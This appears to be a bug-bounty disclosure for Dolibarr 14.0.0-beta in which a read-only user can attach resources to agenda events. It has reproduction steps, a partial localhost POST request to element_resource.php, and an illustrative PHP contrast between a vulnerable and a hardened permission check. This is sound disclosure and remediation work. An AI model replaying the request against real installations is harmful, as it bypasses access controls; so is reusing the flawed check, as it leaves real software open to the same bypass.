Improper Privilege Management in dolibarr/dolibarr


Reported on

May 23rd 2021


An unprivileged user can add a resource to an agenda event


A user with read-only permission can add a resource to an agenda event


dolibarr 14.0.0-beta


1. First go to the admin account and add user B as a normal user.
Now give user B the permissions below for the Events/Agenda and Resources modules:

Events/Agenda-->Read actions (events or tasks) linked to his user account (if owner of event or just assigned to)
Resources-->Read resources

So user B can see agenda events assigned to him as a contributor, but cannot modify them.

2. Now, from the admin account, go to the Agenda module and create an agenda event.
The admin then adds user B to this event as a contributor.

3. Finally, go to user B's account: user B can see the event but cannot edit it.
However, user B can still add a resource to this event with the request below (the form body was not captured in the report; the Content-Length header shows it was present):

POST /dolibarr-develop/htdocs/resource/element_resource.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/resource/element_resource.php?element=action&element_id=2
Cookie: DOLINSTALLNOPING_ec41f89b17787dd4c217ae49b23f4604=0; DOLSESSID_8e8881ad773ee74880c453666c22c288=os0ama6kpuv1qvtr24r0rrj13d
Upgrade-Insecure-Requests: 1
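The report shows that the resource-link endpoint accepts a request from a user who holds only read permissions on agenda events and resources. The behaviour is consistent with the endpoint checking that the caller may read resources but never checking that the caller may modify the event the resource is being attached to. The following stand-alone PHP snippet is an added illustration of that authorization gap and of the check that closes it; it is not Dolibarr's code and does not reproduce commit 02632e. The class names, the rights keys (`myactions_read`, `myactions_create`, `allactions_create`, `read`) and the `userownerid` field are assumptions modelled on Dolibarr's permission layout.

```php
<?php
declare(strict_types=1);

// Added example, not Dolibarr's own code. Stand-in for Dolibarr's $user:
// $rights[module][permission] => bool (keys are assumptions).
final class User
{
    public function __construct(public int $id, public array $rights) {}

    public function can(string $module, string $perm): bool
    {
        return (bool) ($this->rights[$module][$perm] ?? false);
    }
}

// Stand-in for an agenda event: who owns it and who is assigned to it.
final class AgendaEvent
{
    public function __construct(public int $id, public int $userownerid, public array $assignedUserIds) {}
}

// Vulnerable pattern: linking a resource to an event only requires the
// caller to be able to read resources. The event itself is never checked,
// so a read-only contributor can change it. Returns true when the link
// is created, false when access is denied.
function linkResourceVulnerable(User $user, AgendaEvent $event, int $resourceId, array &$links): bool
{
    if (!$user->can('resource', 'read')) {
        return false;
    }
    $links[] = ['element' => 'action', 'element_id' => $event->id, 'fk_resource' => $resourceId];
    return true;
}

// Hardened pattern: attaching a resource modifies the event, so the caller
// must hold a write permission on that event. "allactions_create" covers
// any event, "myactions_create" only events the caller owns (assumed split,
// mirroring Dolibarr's "all actions" / "my actions" permission pairs).
function linkResourceHardened(User $user, AgendaEvent $event, int $resourceId, array &$links): bool
{
    if (!$user->can('resource', 'read')) {
        return false;
    }
    $mayWriteEvent = $user->can('agenda', 'allactions_create')
        || ($user->can('agenda', 'myactions_create') && $event->userownerid === $user->id);
    if (!$mayWriteEvent) {
        return false; // a real Dolibarr page would call accessforbidden() here
    }
    $links[] = ['element' => 'action', 'element_id' => $event->id, 'fk_resource' => $resourceId];
    return true;
}

// Reproduce the report's setup (constructed data): admin is user 1, user B is
// user 2 with read-only agenda and resource rights and is assigned to event 2.
$userB = new User(2, [
    'agenda'   => ['myactions_read' => true],
    'resource' => ['read' => true],
]);
$event = new AgendaEvent(2, 1, [1, 2]);
$links = [];

printf("vulnerable endpoint: %s\n", linkResourceVulnerable($userB, $event, 7, $links) ? 'linked' : 'denied');
printf("hardened endpoint:   %s\n", linkResourceHardened($userB, $event, 7, $links) ? 'linked' : 'denied');
```

Run with `php` on the command line; the first line reports `linked` for user B, the second `denied`. The point generalises beyond the agenda: `element_resource.php` links resources to several element types, so the write check has to be made against whichever element `element`/`element_id` name, not against the resource module alone.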


Laurent Destailleur validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur marked this as fixed with commit 02632e a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE